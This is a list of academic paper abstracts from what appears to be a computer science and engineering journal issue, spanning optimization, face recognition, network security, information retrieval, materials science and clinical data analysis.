A Geometric Programming Approach for The Automotive Production in Turkey [ Full-Text ]
Ersoy ÖZ and İbrahim GÜNEY
Geometric Programming is an important class of nonlinear programming problems. And it is characterized by objective and constraints that have a special form. There may be a nonlinear objective function and nonlinear constraints in a Geometric Programming model. Nonlinear optimization models have been solved by different methods. Among them, Geometric Programming is an efficient method for solving a particular type of nonlinear problems. Thus it may be advantageous over linear programming. In this work, Cobb-Douglas production function is considered as a Geometric Programming model. The 2009 production data of three automotive firms in Turkey are used in the model. The objective of the work is to estimate the number of employees that will minimize the production costs, and the capital input, using Geometric Programming solution method. For the estimations, ggplab toolbox that uses the interior-point algorithm and works under the Matlab software is used.
——————————————————————————————————————————————————————————————————–
Rotation Independent Face Recognition using Neuro-Genetic Hybrid Algorithm [ Full-Text ]
Md. Rabiul Islam and Md. Fayzur Rahman
This paper presents an approach to enhance the performance of a face recognition system using hybrid algorithm based on Artificial Neural Networks (ANN) optimized by Genetic Algorithm (GA) introducing sustainability of rotational distortion. Though the traditional face recognition system is very sensitive to the face parameter variations, the proposed Neuro-Genetic hybrid system is found to be stance and performs well for improving the robustness and naturalness of human-computer-interaction. In this work, we investigated two approaches in order to improve face recognition performance for the rotational face environment: one seeks to extract the features from the face image by using improved and efficient image pre-processing techniques. Fuzzy membership function has been used for the feature extraction purpose. The other task combines the extracted features that have been used by the Neuro-Genetic hybrid algorithm to improve the performance of rotational face recognition system. Experimental results show the superiority of the proposed rotational independent face recognition system according to various orientations.
——————————————————————————————————————————————————————————————————–
Vaccine for Network Worms [ Full-Text ]
M.Goldoust Jildani, S.Jabbehdari and A.Rahmani
Network Worms are one of the most important and common Malware at Internet and Network that their spreading velocity are very high considering to lack of direct interference of human. Automatic spreading fact causes to make Infected most networks and computers by worms in a very short time and as a result the negative and unsuitable effect of the worm in entire network will clear in a short time and cause to major damages to the entire network. Object of presenting this article is introduction of a vaccine that may be injected in entire network and because of it in entire computers of the network and with consideration to type of its operation that is the same renovation of vulnerable holes of machines, has made the network safe and through preventing the worms spreading, it will make the network safe against these type of Malware. In order to study on effect of worm vaccine injection on network, a network that was connected with some vulnerable nodes to internet, was simulated that the gained results showed high decrease of the numbers of the Infected nodes.
——————————————————————————————————————————————————————————————————–
3-Way Handshake Approach towards Secure Authentication Schemes [ Full-Text ]
Gaurav Kumar Tak, Ashok Rangnathan and Pankaj Srivastava
Computer crime can easily be defined as the criminal activity that involves an information technology infrastructure, including illegal access (unauthorized access), illegal interception, data interference (unauthorized damaging, deletion, deterioration, alteration or suppression of computer data),unethical access of information and web services , disturbance of social-peace, systems interference (interfering with the functioning of a computer system by inputting, transmitting, damaging, deleting, deteriorating, altering or suppressing computer data), misuse of devices, forgery (ID theft), and electronic fraud. This paper introduces a new methodology against the intruder as well as phishing attackers. Proposed methodology is based on the 3-way handshake concept between end user and the online portal server. The methodology provides a secure environment for the online transactions using 3 layers: 1st layer following username and password authentication, 2nd and 3rd layers following the cross validation via e-mail and SMS respectively.
——————————————————————————————————————————————————————————————————–
Hybrid Face Recognition System using Multi Feature Neural Network [ Full-Text ]
K.V. Krishna Kishore and G.P.S.Varma
In this paper, a new face recognition method Hybrid Face Recognition System using Multi-Feature Neural Network (MFNN) is proposed. This method consists of five phases: i) Extract images from the database, ii) Normalization and face detection iii)dimensionality reduction using wavelet, iv) Feature extraction using PCA, LDA and v) classification using Multi Feature Neural Network. Combination of PCA and LDA is used for improving the capability of LDA when a few samples of images are available. The proposed system shows improvement on the recognition rates over the conventional LDA and PCA face recognition systems that use Euclidean Distance based classifier and also outperforms over the PCA using neural classifier and LDA using neural classifier. In the proposed system, two different feature domains are extracted from the training set in parallel. Therefore this approach can extract global and local characteristics of face images for classification purpose. The proposed system was tested on ORL, AR, and Indian databases of 40 people containing 10 images of each person with different poses that are taken under varying illumination conditions. Experimental results show that the proposed system outperforms other existing methods in terms of the low classification error and better time complexity.
——————————————————————————————————————————————————————————————————–
Algorithm and Implementation of the Blog-Post Supervision Process [ Full-Text ]
Kamanashis Biswas, Md. Liakat Ali and S.A.M. Harun
A web log or blog in short is a trendy way to share personal entries with others through website. A typical blog may consist of texts, images, audios and videos etc. Most of the blogs work as personal online diaries, while others may focus on specific interest such as photographs (photoblog), art (artblog), travel (tourblog), IT (techblog) etc. Another type of blogging called microblogging is also very well known now-a-days which contains very short posts. Like the developed countries, the users of blogs are gradually increasing in the developing countries e.g. Bangladesh. Due to the nature of open access to all users, some people misuse it to spread fake news to achieve individual or political goals. Some of them also post vulgar materials that make an embarrass situation for other bloggers. Even, sometimes it indulges the reputation of the victim. The only way to overcome this problem is to bring all the posts under supervision of the blog moderator. But it totally contradicts with blogging concepts. In this paper, we have implemented an algorithm that would help to prevent the offensive entries from being posted. These entries would go through a supervision process to justify themselves as legal posts. From the analysis of the result, we have shown that this approach can eliminate the chaotic situations in blogosphere at a great extent. Our experiment shows that about 90% of offensive posts can be detected and stopped from being published using this approach.
——————————————————————————————————————————————————————————————————–
An Indexing Technique for Web Ontologies [ Full-Text ]
Abad Shah, Amjad Farooq, Syed Ahsan and Mohammad Imran
With respect to semantic web, the ontologies are usually stored as Resource Description Framework (RDF) documents. Different techniques including advanced indexing techniques based on path index, keyword index, suffix arrays and linked data approach are being used to index RDF documents. However, existing RDF based indexing techniques have two major problems, which results in poor performance. These problems, facing by most of the existing indexing techniques include index size and lookup time. These techniques have large index and small lookup time. In this paper, we propose a technique for indexing RDF documents with smaller index size and faster lookup time. We also present a lightweight implementation of our proposed indexing scheme using Java, Perl and MySQL as database system. We use synthetic dataset from the Lehigh University Benchmark containing 2.8 million triples to compare with implemented semantic systems like Jena2, Sesame and Redland.
——————————————————————————————————————————————————————————————————–
Improved compact State Machines for High Performance Pattern Matching [ Full-Text ]
Shanthi Makka
Pattern Matching is finding all occurrences of pattern in a Text. Pattern matching is used in wide range of applications such as search for particular patterns in DNA sequences, network intrusion detection, virus scanning, etc. Internet search engines also use them to find web pages relevant to queries. Recently, parallel pattern matching engines, based on ASICs, FPGAs or network processors, performs pattern matching by using multiple numbers of finite state machines. The state migration in the matching procedure incurs intensive memory accesses. Thus, it is difficult to minimize the storage of state machines such that they can be fit in on-chip or other fast memory modules to achieve high-speed pattern matching. So it is required to minimize the storage space and that’s why in this paper I propose optimization techniques, namely state re-labeling and memory partition, to reduce state machine storage. The paper also presents architectural designs based on the optimization strategy. We evaluate our design using realistic pattern sets, and the results show state machine memory reduction up to 90.1%.
——————————————————————————————————————————————————————————————————–
A New Dynamic Weight Assignment Schema for Index Terms Based on Statistical Approach [ Full-Text ]
Abad Shah, Syed Ahsan and Amjad Farooq
During the development of Information Retrieval (IR) systems, weights are assigned to an extracted set of index terms, and then they are used for different purposes such as indexing, partial matching, and computing rankings. The weight assignment schemes are usually provided by IR models that are selected and used in the development of IR systems. Currently available weight assignment schemes are static which means that once weights are assigned to index terms, their values never change during the whole life-span of an IR system. Before this weight assignment scheme, we have already proposed a dynamic weight assignment scheme that can be used as part of any IR model. This previous dynamic weight assignment scheme is an empirical and intuitive. In this paper, we propose another dynamic weight assignment scheme based on statistical approach. In our opinion, this new scheme can give a better performance than our previous scheme because this scheme is based on proper foundation.
——————————————————————————————————————————————————————————————————–
Design & Implementation of Modified Mac Based Pipelining Technique for Wireless Networks [ Full-Text ]
V. Kumar and P. Balasubramanie
Wireless networks and communications made revolution into human life. The demand for wireless networks is increasing and wireless networks need to meet lot of challenges. Once such issue if design of efficient MAC protocol for wireless networks. In this paper, we study and develop a new MAC protocol based on the concepts of pipelining techniques. We observe that the performance of the proposed protocol is good.
——————————————————————————————————————————————————————————————————–
Energy Consumption and Starvation Reduction in Multi-Robot Wireless Communication [ Full-Text ]
Priya Shanmugam
In multi-robot system (MRS), energy consumption and starvation are the major problem while using IEEE 802.11 protocol. The starvation problem is determined by Contention window, i.e., a communication frame between source and destination. Previous work on contention window of MAC IEEE 802.11 has a series of window size by doubling their size when it is waiting for the communication channel, example 8, 16, 24, to 1024. In the proposed work the contention window is incremented and decremented using natural logarithm to achieve effective communication. By using trapezoidal fuzzy logic the energy consumption between robots used least energy to nearest node and high energy to farthest node based on the link quality, distance, noise and received signal strength between the neighboring nodes. Thus gets good routing.
——————————————————————————————————————————————————————————————————–
Cross-site scripting attack in Social Networking Environment [ Full-Text ]
Fahim Mohammed, Deepak Singh Tomar and J. L. Rana
Presently social network is an effective means of sharing end user information and views, as the availability of the high network bandwidth and enough memory space the effective use of social network is possible for end user to share information. Security and privacy are still vague. In recent years many social network sites have suffered from cross site scripting attacks and phishing attacks, which were conducted by suspicious users through inserting a vulnerable script into web form components. In this work the attack scenario in social network environment is implemented to demonstrate how an attacker uses the vulnerability of poor written application code to degrade the server performance and phishing attack in the social website. Challenges in handling cross side scripting attacks in web environment are also presented.
——————————————————————————————————————————————————————————————————–
Analytical Solution for Enzyme Catalyzed Reaction Based On Total Quasi Steady State Approximation [ Full-Text ]
Prashant Dwivedi and Madhvi Shakya
The Michaelis-Menten Formalism based on standard quasi steady state approximation (sQSSA) derived for single enzyme reaction, described the kinetics of many enzyme catalyzed reactions for a number of years. Based on this sQSSA a closed form solution for basic enzyme reaction was derived earlier by Schnell and Mendoza. This solution was given in terms of a relatively new function known as Lambert W function which satisfies the transcendental equation W(x)exp(W(x)) = x. But this formalism is valid only when enzyme concentration is sufficiently small. Recently Borghans et. al. have introduced the total quasi steady state approximation (tQSSA) which is valid for a broader range of parameters. In the present work an attempt has been made to derive an analytical solution for substrate decomposition and product formation with the aid of Lambert W function for single enzyme-substrate reaction, based on total quasi steady state approximation.
——————————————————————————————————————————————————————————————————–
New Optimized Generic Operational Transformation Consistency Control Algorithms Supporting String Operations in Collaborative Applications [ Full-Text ]
Santosh Kumawat and Ajay Khunteta
Real-time cooperative editing systems allow multiple users to view and edit the same document at the same time from multiple sites connected by some networks. Consistency maintenance is one of the challenging job in the design and implementation in such type of systems. Operational Transformation (OT) is an established optimistic consistency control method in collaborative applications. All OT algorithms only consider two characters based primitive operations insert and delete. Our algorithm supports two string based primitive operations. This paper presents a new optimized generic OT control algorithm SITOSq and MswapDsqD that has reduced the runtime overheads of recursions of ITOSq algorithm and swapDsqD algorithm respectively. Also SITOL and MswapLO have reduced recursion as compared to ITOL and swapLO.
——————————————————————————————————————————————————————————————————–
A Comparative study of MANET and VANET Environment [ Full-Text ]
Arzoo Dahiya and R. K. Chauhan
On demand set up, fault tolerance and unconstrained connectivity are a couple of advantages ,that why mobile computing continues to enjoy rapid growth. In last three decade ,tremendous improvement is made in research area of wireless adhoc network and now a days ,one of the most attractive research topic is inter vehicle communication i.e. realization of mobile adhoc network .VANETs have been recently attracting an increasing attention from both industry as well as research communities .A rich literature in MANET exists, but the availability of traffic data and vehicle equipment motivate the researchers to explore the special characteristics of VANET. In this paper we survey and compare from the literature ,the environment for MANET and VANET. Finally we share a collection of useful references.
——————————————————————————————————————————————————————————————————–
Impact of Aspect Oriented Programming on Software Development Design Quality Metrics-A Comparative Study [ Full-Text ]
Kotrappa Sirbi and Prakash Jayanth Kulkarni
The aspect-oriented programming approach is supposed to enhance a system’s features, such as its modularity, readability and simplicity. Due to a better modularization of crosscutting concerns, the developed system implementation would be less complex and more readable. Thus software development efficiency would increase, so the system would be created faster than its object-oriented equivalent. The study reveals that the aspect-oriented programming approach appears to be a full fledged alternative to the pure object-oriented approach. In this comparative study, we present existing and new Software metrics useful in the design phase of the Object Oriented Software Development (OOSD) and also which have extension in SDLC of Aspect Oriented Software Development (AOSD).In this paper, we will compare definitions for proposed metrics for AOSD design quality metrics. In this we will show all those metrics which are useful for improving the software design quality metrics using Aspect Oriented Software Development (AOSD).
——————————————————————————————————————————————————————————————————–
Regression Testing Techniques [ Full-Text ]
Rashmi Pandey
The most technical and typical phase in the software development life cycle is maintenance phase, in which the development team is supposed to maintain the software which is delivered to the clients by them on proper time. Software maintenance results for the reasons like error corrections, enhancement of capabilities, modifications of outdated modules and optimization. Now the changed or modified software needs testing known as regression testing. In this paper we have presented the various types of regression testing techniques their classifications presented by various researchers ,explaining selective and prioritizing test cases for regression testing in detail.
——————————————————————————————————————————————————————————————————–
Script Identification from Multilingual Indian Documents using Structural Features [ Full-Text ]
Rajesh Gopakumar, N.V.SubbaReddy, Krishnamoorthi Makkithaya and U.Dinesh Acharya
Script Identification from a given document image is an important process for many computer applications such as automatic archiving of multilingual documents, searching online archives of document images and for the selection of script specific OCR in a multilingual environment. In this paper a Zone-based Structural feature extraction algorithm towards the recognition of South-Indian scripts along with English and Hindi is proposed. The document images are segmented into lines and the line image is divided into different zones and the structural features are extracted. A total of 37 features were extracted in the first level and then reduced to an optimal number of features using wrapper and filter selection approaches. The K-nearest neighbor and the support vector machine classifiers are used for classification and recognition purpose. Very good classification accuracy is achieved on the optimal feature set.
——————————————————————————————————————————————————————————————————–
Intelligent Maturity Cure Prediction Model (IMCPM) for Polymer Matrix Composite Curing [ Full-Text ]
Doreswamy Hosahalli
In this paper, a novel Intelligent Maturity Cure Prediction Model(IMCPM) is designed to predict the mature cure rate and temperature required for ideal curing of composite materials. Pre defined knowledge discovery models and numerical simulation models are integrated as an Intelligent Maturity Cure Prediction Model (IMCPM) for predicting and analysis of cure status that has inherently associated with polymer matrix, reinforcement fiber and the pultrusion process conditions. Polymer resign matrix and reinforcement fiber properties satisfying the composite component are revealed by the data mining/knowledge discovery models. The experimentally determined process conditions are defined in the knowledgebase of the proposed system for improving decision making performance. The maturity cure status of composite materials is analyzed with kinetic model and heat governing partial differential equation. IMCPM is a knowledge based prediction model, which incorporates heat transfer and resin kinetic models coupled with materials database, knowledgebase of prerequisite processing strategies, and knowledge discovery models for the prediction of polymer resign and reinforcement fiber satisfying the composite component. It predicts optimal cure rate and temperature imperative for the ideal curing of epoxy resin impregnated composites, preventing part overheating while maintaining maximum cure heat up rate. This results in a significant reduction in total cure time over standard methods. The system uses a cure process model to determine optimal cure profiles for tool/part configurations of varying thermal characteristics. These profiles indicate the heating and cooling necessary to insure a complete cure of part in the pultrusion in the minimum amount of time. The model is shown to be a particularly convenient method for examining the qualitative aspects of various process scenarios prior to running the pultruder.
——————————————————————————————————————————————————————————————————–
Knowledge Discovery System For Fiber Reinforced Polymer Matrix Composite Laminate [ Full-Text ]
Doreswamy Hosahalli
In this paper, Knowledge Discovery System (KDS) is proposed for the extraction of knowledge, mean stiffness of a polymer composite material in which the fibers are placed at different orientations. Cosine amplitude method is implemented for retrieving compatible polymer matrix and reinforcement fiber from the polymer and reinforcement database respectively, based on the design specifications. Fuzzy classification rules to classify fibers into short, medium and long fiber classes are derived based on the fiber length and the computed or derived critical length of fiber. Longitudinal and Transverse module of Polymer Matrix Composite consisting of seven layers with different fiber volume fractions and different fibers’ orientations at 0,15,30,45,60,75 and 90 degrees are analyzed through “Rule-of-Mixture” material design model. The analysis results are represented in different graphical steps and have been measured with statistical parameters. The data mining application implemented here has focused the mechanical problems of material design and analysis. Therefore, this system is proposed an expert decision support system for optimizing the materials performance for designing light-weight and strong, and cost effective polymer composite materials.
——————————————————————————————————————————————————————————————————–
Customer Perception on Internet Banking and their Impact on Customer Satisfaction & Loyalty: A Study in Indian Context [ Full-Text ]
Neha Dixit and Saroj K. Datta
Internet banking has become increasingly important because it is one of the most popular delivery channels for banking services accepted by customers in cyber era. This study investigates on how the customers perceive the value of Internet banking over the traditional way of banking. It identifies the perceived service quality dimensions of self-service technology (Internet banking) and the impact of these perceived service quality dimensions towards customer satisfaction level in Internet banking. Primary data was collected from 250 respondents, through a structured questionnaire. Statistical analysis, descriptive statistics and correlation were used to know the perceived service quality of Internet banking (IB) and level of satisfaction between customers in India. The finding depicts many factors such as perceived value, perceived service quality; customer satisfaction and their loyalty have significant impact on a customer acceptance of Internet banking.
——————————————————————————————————————————————————————————————————–
Keys of Software Testing [ Full-Text ]
Ashok Shrivastava and Naveen Gupta
Software testing is a process aimed to evaluate the capability of a program or system and to determine that it accomplished its required task. Although crucial to software quality and widely deployed by programmers and testers, software testing still remains an art, due to limited understanding of the principles of software. The difficulty in software testing comes from the complexity of software: we can not completely test a program with qualify complexity. Testing is much more than debugging. The purpose of testing can be quality assurance, verification and validation, or reliability estimation. Testing can be used as a generic metric as well. Correctness testing and reliability testing are two major areas of testing. Software testing is a matter-off between budget, time and quality.
——————————————————————————————————————————————————————————————————–
Model Driven Framework for Networked Application Software Generation [ Full-Text ]
K. Ramesh and T. Ramesh
This paper presents a domain-specific, component-based framework to model networked systems and to automate the networked application software generation. The framework employs two-level model, one for specifying system-level architecture, and the other for process-level. The former contains unified models for networked elements called as Networked Nodes(NN). With the instrumentation of Networked Node as a Generic Modeling Environment (GME) metamodel – NetProc, a networked system becomes composition of NetProcs, Sub-Systems, Shared Objects and their interconnections. At process-level, modeling of connection management, event detection, de-multiplexing, event dispatching, and composition of dynamically configured services which are specific to networked elements is supported. The exported model in XML has been parsed and a proper intermediate structure is constructed. Applying appropriate code generation techniques and by reusing components, the software generation is automated. The proposed framework supports customization of a networked system and is found to increase the software productivity.
——————————————————————————————————————————————————————————————————–
Markov Process to forecast the demand of the motor policies in Insurance Industry in the market [ Full-Text ]
Neha Jain and R. K. Shrivastava
Finance, budgeting and investments are the area of management decision making where the tools and techniques of Operation Research are applied. In the modern times of economic crisis, it has become very necessary for every government to have a careful planning for the economic development of a country. Operation research techniques can be fruitfully applied in Insurance Corporation to decide that what should be the premium rates for various modes of policies and how best the profits could be distributed in the case of with profit policies. Markov Process is applicable in such situations where the state of system can be defined by some descriptive measure of numerical value and where the system moves from one state to another on a probability basis. This problem is an example of a brand switching problem that often arises in the sale of consumer goods.
——————————————————————————————————————————————————————————————————–
Distance Parameter Based Facial Expression Recognition Using Neural Networks [ Full-Text ]
Anitha C, M K Venkatesha and B Suryanarayana Adiga
In any facial expression recognition system, the location and extraction of features is the first task to be accomplished. Extraction of features using feature points recognition is one of the most widely used technique. The proposed work is capable of recognizing facial expressions with only eight parameters from a set of ten feature points. The system identifies the basic emotions: Happiness, Sadness, Surprise, Disgust, Anger and Fear. Distance parameters are used for the recognition of expressions. The distance parameters are derived from the feature points extracted from the images. The use of distance parameters makes the system invariant to pose and illumination to a certain extent. The parameter set is trained and tested using a feed-forward neural network.
——————————————————————————————————————————————————————————————————–
Application of Unsupervised Learning in Clinical Oncology Practice – Exploring Anxiety Characteristics in Chemotherapy-Induced Nausea and Vomiting through Principal Variables [ Full-Text ]
Kevin Yi-Lwern Yap, Xin Ran Yak, Vivianne Shih, Wai Keung Chui and Alexandre Chan
State anxiety is a risk factor for chemotherapy-induced nausea and vomiting (CINV). However, anxiety is a subjective symptom and is difficult to quantify in clinical practice. Clinicians need appropriate anxiety measures to assess patients’ risks of CINV. We illustrate how unsupervised learning techniques can be applied in oncology practice to explore anxiety characteristics that can be used for the clinical surveillance of cancer patients with CINV. A single-centre, prospective, observational study was done on 49 head-and-neck cancer patients on cisplatin-based chemotherapy and appropriate antiemetic therapy. CINV events and antiemetic use were recorded using a standardized diary, while patients’ anxiety characteristics were evaluated using the Beck Anxiety Inventory. Principal component analysis (PCA) was used as an exploratory technique for statistical analysis. Three anxiety characteristics (indigestion, faintness, numbness) were identified as potential clinical predictors of CINV through the use of principal variables. The potential of PCA as a technique for characterizing anxiety in patients with CINV is indeed appealing. Despite the need to address several key issues before PCA finds widespread applications in cancer supportive care, we hope this study shows the usefulness of PCA as a potential technique in analyzing clinical populations, so as to ultimately improve patients’ quality of life.
——————————————————————————————————————————————————————————————————–
Buffer Overflow Prevention in Mobile RFID Environment using Train Algorithm [ Full-Text ]
M. Sandhya and T. R. Rangaswamy
RFID technology is widely used worldwide in a broad range of applications. Such technology however raises security concerns about the protection of the information stored in the RFID tags and exchanged during the wireless communication with the readers. Buffer overflow vulnerabilities dominate the area of remote network penetration vulnerabilities, where an anonymous Internet user seeks to gain partial or total control of a host. If buffer overflow vulnerabilities could be effectively eliminated, a very large portion of the most serious security threats would also be eliminated.This paper describes the use of train algorithm to tackle the buffer over flow attacks in mobile RFID environment.
——————————————————————————————————————————————————————————————————–
Syntactic Trimming of Extracted Sentences for Improving Extractive Multi-document Summarization [ Full-Text ]
Kamal Sarkar
For managing a vast hoard of online or offline information, summarization can be the useful means because the users can decide about the relevance of an individual document or a document cluster using just summary information. Multi-document summaries can enable the users to identify the main theme (central idea) of a cluster of texts very rapidly. This paper presents a sentence compression based summarization technique that uses a number of local and global sentence-trimming rules to improve the performance of an extractive multi-document summarization system. For our experiments, we develop (1) a primary summarization system, which extracts sentences to form a draft summary and (2) a trimming component, which accepts a draft summary for revision. The trimming component eliminates the low content and redundant elements from the sentences in the draft summaries using a number of local and global sentence-trimming rules without hampering the grammaticality and the fluency of the summaries. In effect, the trimming process makes rooms for more diverse and salient units to appear in a summary. Our test results on DUC 2004 data set show that the summarization system, which integrates both the extraction component and the trimming component, performs better than some state-of-the art summarization approaches.